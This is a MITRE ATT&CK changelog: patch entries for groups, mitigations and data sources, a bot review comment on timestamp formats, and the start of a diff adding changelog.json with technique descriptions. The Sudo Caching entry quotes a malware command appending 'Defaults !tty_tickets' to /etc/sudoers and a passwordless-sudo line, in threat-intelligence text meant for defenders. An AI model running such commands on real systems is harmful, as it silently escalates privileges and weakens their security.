modified2025-04-16 20:37:41.346000+00:002025-04-25 14:49:43.099000+00:00

[G0062] TA459

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.273000+00:002025-04-25 14:49:19.743000+00:00

[G0089] The White Company

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.790000+00:002025-04-25 14:49:32.865000+00:00

[G0028] Threat Group-1314

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.353000+00:002025-04-25 14:49:05.962000+00:00

[G0076] Thrip

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.404000+00:002025-04-25 14:49:36.307000+00:00

[G1017] Volt Typhoon

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2024-05-21 20:12:20.029000+00:002025-04-30 13:27:45.018000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsVlad Shumaher, Palo Alto Networks

[G0124] Windigo

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:36.164000+00:002025-04-25 14:49:09.909000+00:00

[G0018] admin@338

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:33.261000+00:002025-04-25 14:48:47.886000+00:00

mobile-attack

Patches

[G0096] APT41

Current version: 4.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-10-10 14:31:35.326000+00:002025-04-22 21:56:33.318000+00:00

[G0097] Bouncing Golf

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:02.103000+00:002025-04-25 14:41:32.241000+00:00

[G1004] LAPSUS$

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-07 14:44:59.715000+00:002025-04-21 19:40:47.538000+00:00
x_mitre_contributors[2]Flavio Costa, CiscoFlávio Costa, @Segurança Descomplicada

Campaigns

enterprise-attack

Patches

[C0018] C0018

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:46.763000+00:002025-04-21 19:40:47.537000+00:00
x_mitre_contributors[0]Flavio Costa, CiscoFlávio Costa, @Segurança Descomplicada

Mitigations

mobile-attack

Patches

[M1002] Attestation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:19.448000+00:002025-04-25 14:40:12.762000+00:00

[M1010] Deploy Compromised Device Detection Method

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:19.136000+00:002025-04-25 14:40:12.032000+00:00

[M1009] Encrypt Network Traffic

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.668000+00:002025-04-25 14:40:10.924000+00:00

[M1012] Enterprise Policy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.032000+00:002025-04-25 14:40:09.487000+00:00

[M1003] Lock Bootloader

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.821000+00:002025-04-25 14:40:11.299000+00:00

[M1001] Security Updates

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.982000+00:002025-04-25 14:40:11.661000+00:00

[M1004] System Partition Integrity

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.484000+00:002025-04-25 14:40:10.556000+00:00

[M1006] Use Recent OS Version

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:17.864000+00:002025-04-25 14:40:08.756000+00:00

[M1011] User Guidance

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.181000+00:002025-04-25 14:40:09.845000+00:00

ics-attack

Patches

[M0915] Active Directory Configuration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:26.911000+00:002025-04-25 14:39:12.577000+00:00

[M0803] Data Loss Prevention

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:27.444000+00:002025-04-25 14:39:13.297000+00:00

[M0805] Mechanical Protection Layers

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:29.910000+00:002025-04-25 14:39:16.894000+00:00

[M0816] Mitigation Limited or Not Effective

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:27.652000+00:002025-04-25 14:39:13.833000+00:00

[M0809] Operational Information Confidentiality

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:30.453000+00:002025-04-25 14:39:17.799000+00:00

[M0920] SSL/TLS Inspection

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:28.819000+00:002025-04-25 14:39:15.463000+00:00

[M0812] Safety Instrumented Systems

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:32.513000+00:002025-04-25 14:39:20.300000+00:00

[M0919] Threat Intelligence Program

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:32.342000+00:002025-04-25 14:39:19.937000+00:00

[M0815] Watchdog Timers

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:30.248000+00:002025-04-25 14:39:17.436000+00:00

Data Sources

enterprise-attack

Patches

[DS0026] Active Directory

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:09.450Z2025-04-25T14:49:52.686Z

[DS0015] Application Log

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.207Z2025-04-25T14:40:03.068Z

[DS0037] Certificate

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.496Z2025-04-25T14:49:54.643Z

[DS0038] Domain Name

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:11.900Z2025-04-25T14:49:57.359Z

[DS0016] Drive

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:29.888Z2025-04-25T14:40:06.700Z

[DS0027] Driver

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:09.930Z2025-04-25T14:49:53.761Z

[DS0018] Firewall

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.372Z2025-04-25T14:49:58.457Z

[DS0001] Firmware

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:49.401Z2025-04-25T14:40:07.251Z

[DS0036] Group

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.972Z2025-04-25T14:49:55.737Z

[DS0007] Image

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:11.122Z2025-04-25T14:49:56.103Z

[DS0035] Internet Scan

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.675Z2025-04-25T14:49:51.440Z

[DS0008] Kernel

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.054Z2025-04-25T14:49:57.731Z

[DS0011] Module

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:13.134Z2025-04-25T14:40:06.151Z

[DS0023] Named Pipe

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:09.639Z2025-04-25T14:49:53.223Z

[DS0033] Network Share

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:09:58.319Z2025-04-25T14:40:03.613Z

[DS0021] Persona

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.210Z2025-04-25T14:49:58.095Z

[DS0014] Pod

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.521Z2025-04-25T14:49:58.983Z

[DS0003] Scheduled Job

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:33.637Z2025-04-25T14:40:05.238Z

[DS0019] Service

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:47.833Z2025-04-25T14:40:04.346Z

[DS0020] Snapshot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.827Z2025-04-25T14:49:55.198Z

[DS0005] WMI

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:11.750Z2025-04-25T14:49:56.995Z

[DS0006] Web Credential

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.491Z2025-04-25T14:49:51.076Z

[DS0024] Windows Registry

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.970Z2025-04-25T14:40:05.783Z

ics-attack

Patches

[DS0015] Application Log

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.207Z2025-04-25T14:40:03.068Z

[DS0016] Drive

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:29.888Z2025-04-25T14:40:06.700Z

[DS0001] Firmware

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:49.401Z2025-04-25T14:40:07.251Z

[DS0011] Module

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:13.134Z2025-04-25T14:40:06.151Z

[DS0033] Network Share

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:09:58.319Z2025-04-25T14:40:03.613Z

[DS0003] Scheduled Job

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:33.637Z2025-04-25T14:40:05.238Z

[DS0019] Service

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:47.833Z2025-04-25T14:40:04.346Z

[DS0024] Windows Registry

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.970Z2025-04-25T14:40:05.783Z

Data Components

enterprise-attack

Patches

Image: Image Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:16:02.863Z2025-04-25T14:49:48.777Z

Instance: Instance Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:13:01.557Z2025-04-25T14:48:42.003Z

Logon Session: Logon Session Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:23.075Z2025-04-25T14:39:59.118Z

Scheduled Job: Scheduled Job Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:39.543Z2025-04-25T14:39:56.271Z

Service: Service Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:51.004Z2025-04-25T14:39:52.137Z

Snapshot: Snapshot Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:15:14.954Z2025-04-25T14:49:42.387Z

User Account: User Account Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:09:47.932Z2025-04-25T14:49:17.060Z

Volume: Volume Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:17:22.350Z2025-04-25T14:49:47.887Z

Volume: Volume Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:17:15.849Z2025-04-25T14:49:38.106Z

Volume: Volume Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:17:12.667Z2025-04-25T14:49:35.774Z

Web Credential: Web Credential Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:13:30.118Z2025-04-25T14:49:08.104Z

Web Credential: Web Credential Usage

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:13:26.927Z2025-04-25T14:48:47.351Z

ics-attack

Patches

Operational Databases: Device Alarm

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T21:26:36.998Z2025-04-25T14:39:55.892Z

Logon Session: Logon Session Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:23.075Z2025-04-25T14:39:59.118Z

Operational Databases: Process History/Live Data

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T21:26:36.842Z2025-04-25T14:39:54.996Z

Operational Databases: Process/Event Alarm

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T21:26:36.694Z2025-04-25T14:39:52.496Z

Scheduled Job: Scheduled Job Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:39.543Z2025-04-25T14:39:56.271Z

Service: Service Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:51.004Z2025-04-25T14:39:52.137Z
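Review bot: the generated changelog-detailed.html renders the `modified` field in two different timestamp formats within one document: the mitigation entries show values like `2025-04-16 21:26:30.453000+00:00 → 2025-04-25 14:39:17.799000+00:00`, while the data source and data component entries show ISO-8601 values like `2025-04-16T20:39:09.450Z → 2025-04-25T14:49:52.686Z`. Since every entry in these Patches sections records only the added `x_mitre_deprecated: False` field and a `modified` bump, with `Current version` unchanged, normalizing the timestamp rendering in the changelog generator (and emitting a trailing newline, which the diff flags as missing for this file) would make the tables easier to scan and to diff against the next release.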
+ + + \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/changelog.json b/modules/resources/docs/changelogs/v17.0-v17.1/changelog.json new file mode 100644 index 00000000000..260a8539b5b --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/changelog.json 
@@ -0,0 +1,27124 @@ +{ + "enterprise-attack": { + "techniques": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-30 14:34:44.992000+00:00", + "modified": "2025-04-25 14:45:52.996000+00:00", + "name": "Sudo and Sudo Caching", + "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. 
This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/003", + "external_id": "T1548.003" + }, + { + "source_name": "sudo man page 2018", + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "url": "https://www.sudo.ws/" + }, + { + "source_name": "OSX.Dok Malware", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. 
Retrieved July 10, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + }, + { + "source_name": "cybereason osx proton", + "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", + "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification", + "Command: Command Execution", + "Process: Process Creation", + "Process: Process Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:52.996000+00:00\", \"old_value\": \"2025-04-15 19:58:08.135000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1022: Restrict File and Directory Permissions", + "M1026: Privileged Account Management", + "M1028: Operating System Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0009: Process (Process Metadata)", + "DS0017: Command (Command Execution)", + "DS0022: File 
(File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-18 18:34:49.414000+00:00", + "modified": "2025-04-25 14:47:45.982000+00:00", + "name": "SID-History Injection", + "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134/005", + "external_id": "T1134.005" + }, + { + "source_name": "Microsoft SID", + "description": "Microsoft. 
(n.d.). Security Identifiers. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx" + }, + { + "source_name": "Microsoft SID-History Attribute", + "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms679833.aspx" + }, + { + "source_name": "Microsoft Well Known SIDs Jun 2017", + "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.", + "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems" + }, + { + "source_name": "Microsoft Get-ADUser", + "description": "Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.", + "url": "https://technet.microsoft.com/library/ee617241.aspx" + }, + { + "source_name": "AdSecurity SID History Sept 2015", + "description": "Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.", + "url": "https://adsecurity.org/?p=1772" + }, + { + "source_name": "Microsoft DsAddSidHistory", + "description": "Microsoft. (n.d.). Using DsAddSidHistory. 
Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms677982.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Alain Homewood, Insomnia Security", + "Vincent Le Toux" + ], + "x_mitre_data_sources": [ + "Active Directory: Active Directory Object Modification", + "Process: OS API Execution", + "User Account: User Account Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. 
(Citation: Microsoft DsAddSidHistory)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:45.982000+00:00\", \"old_value\": \"2025-04-15 19:59:00.556000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1015: Active Directory Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0002: User Account (User Account Metadata)", + "DS0009: Process (OS API Execution)", + "DS0026: Active Directory (Active Directory Object Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 17:16:11.806000+00:00", + "modified": "2025-04-25 14:46:38.641000+00:00", + "name": "Security Support Provider", + "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. 
